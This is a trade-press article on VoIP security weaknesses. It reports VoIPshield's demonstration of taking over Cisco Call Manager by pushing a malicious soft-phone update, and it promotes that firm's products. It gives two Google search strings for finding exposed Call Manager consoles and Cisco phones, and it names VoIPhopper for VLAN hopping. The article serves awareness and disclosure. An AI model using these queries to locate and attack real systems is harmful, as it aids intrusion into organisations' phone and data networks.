When It Comes to VoIP, Beware Of The Weak Spots

VoIP

The vendors began cooperating and acknowledging on their Web sites of the risks to their VoIP systemsand#8212;only after VoIPshield continued reporting the vulnerabilities publicly. Nortel attributed a vulnerability to VoIPshield on April 10, for example.

Because of legislation in the data world, vendors have to announce vulnerabilities to the public. There's no firm legislation, however, in the voice world, so it's up to vendors to disclose vulnerabilities. And so far, they've failed to be up front with customers. For example, FDIC examiners are not asking about VoIP yet, according to VoIPshield.

This is the state of VoIP security today. Most of the 300,000 privately owned IP-PBX systems deployed throughout the U.S. are wide open to anyone that wants to hack them. And that's only the tip of the iceberg.

Originally used as a call saver, VoIP systems are now being integrated with data LANs to form unified communication platforms. The goals of VoIP vendors like Cisco and Microsoft run quite deeply into the data stack. By combining instant messaging, presence awareness and other communication routes into a single platform, users will be able to stay in touch with everyone at all times. Microsoft touts this highly integrated VoIP architecture with its Office Communications Server 2007.

id
unit-1659132512259
type
Sponsored post

Those that believe in the new architecture and convert must know that their integrated VoIP platforms are in close contact with data LANs. And here's where things can go awry quickly.

Next: An Eye-Opener An Eye-Opener
Ottawa-based VoIPshield showed us a hack from outside a firewall using a known vulnerability in Cisco's Call Manager 5.0. First of all, a quick search for Call Manager on Google gave us an eye-opening experience.

Cut and paste the following example into Google's search bar:
inurl: "ccmadmin"
intext: CallManager.

While not all links returned lead you to an exposed Call Manager, look for "Cisco Unified CallManager Console." Once you click on the link, you'll find Cisco's CallManager wide open to the Web.

When contacted about this article, Cisco had no comment. This is public information, so we are not divulging any secrets. Moreover, VoIPshield and the Test Center agreed not to release further details of the exploit. There are many other searches you can do that will show much more information about gaining access to VoIP systems.

Ignorance may be bliss, but not so with VoIP. Over the years, the misconception about phone systems being isolated boxes that can only transmit voice, and the lack of information perpetuated by vendors, have led many administrators to believe that it is OK to expose their call manager Web-based interfaces to the Web.

For the exploit, VoIPshield researchers used a laptop to connect to a Cisco Call Manager. The researchers used another laptop to connect to a Cisco soft phone and to view responses from a Call Manager. All that was needed was the IP of the call manager to run the tools.

Once connected, the researchers forced an update to the soft phones. The update contained an executable that allowed the researchers to gain full control of users' corporate computers. The executable takes effect only after a reboot. Because the executable was bundled as part of the Cisco soft phone application, it was completely undetected by personal firewalls or anti-malware software.

It Gets Better
If that still hasn't shocked you, here's another Google search request that allows hackers to find Cisco phones:
inurl: NetworkConfiguration cisco.

Keep in mind that it is possible to find phones exposed to an external network. From there, hackers can quickly gain the knowledge on how to exploit a Call Manager that works with the exposed phones.

The NetworkConfiguration search exposes IP addresses and brings up a page on some of the results with the IP addresses of the call manager. One search, one click, and there you go!

Since VoIP works alongside data LANs, hackers can use a free utility called VoIPhopper to jump between voice and data VLANs. This is by far the easiest way to bypass firewalls and just about all IDS software on the market. What's more, crafted VoIP packets can circumvent today's security IDS stacks, so even a direct attack in a multilayered corporate intranet or WAN cannot stop hackers from gaining unprecedented access to internal systems.

Let's just say, if banks can be extorted, anyone is vulnerable. Most administrators don't realize that VoIP phones are located in hostile environments. These phones are located where contractors work, in lobby areas and in hotel rooms. Simply walk into a bank and ask for a phone and almost anyone would not think twice to leave you unattended with the phone.

At 20 employees, VoIPshield is working to establish itself as a security vendor. The company is unique, seeing as it's one of the first to do this sort of work, but the technology is largely unknown. Like the more established data security vendors, VoIPshield is using its security alerts to gain the vendors' respect and market trust. In turn, the company offers two key products to partners and customers: VoIPaudit and VoIPguard.

Data VARs should take advantage of these flaws by offering customers security scans with the VoIPaudit technology.

VoIPaudit performs a security audit on VoIP infrastructure by automatically discovering devices and services. The product also tests for vulnerabilities. VoIPguard comes with two detection engines. One engine is signature-based and relies on discovered vulnerabilities in its database. The other engine is much smarter and attempts to discern traffic to find whether it's malicious or not. The smart engine looks at traffic going through logging events, studies protocols and general IP-PBX traffic behavior. Both products are fed with updates as part of a subscription service.

Next: U.S. Cyber Chief: 'The Right Balances' U.S. CYBER CHIEF: 'THE RIGHT BALANCES'
When considering the investments that need to be made to shore up the security of the Internet, there are lessons to be learned from the U.S. Founding Fathers, according to Rod Beckstrom, director of the National Cyber Security Center (NCSC) in the U.S. Department of Homeland Security. In his keynote at Black Hat in Las Vegas earlier this month, Beckstrom referenced the managerial capacities of Abraham Lincoln and 1776 Virginia Bill of Rights author George Mason, and said the DNS vulnerability underscores the critical need for government and the IT industry to boost investment in protecting key protocols, including BGP, SMS/IP, and even POTS (plain old telephone service). The director noted that during natural disasters, SMS has proven to be an extremely resilient form of communication, and also discussed how the rising tide of cybercrime dictates a need for stronger security, but privacy must also be preserved, and the IT security industry will play a central role in striking the proper balance between the two.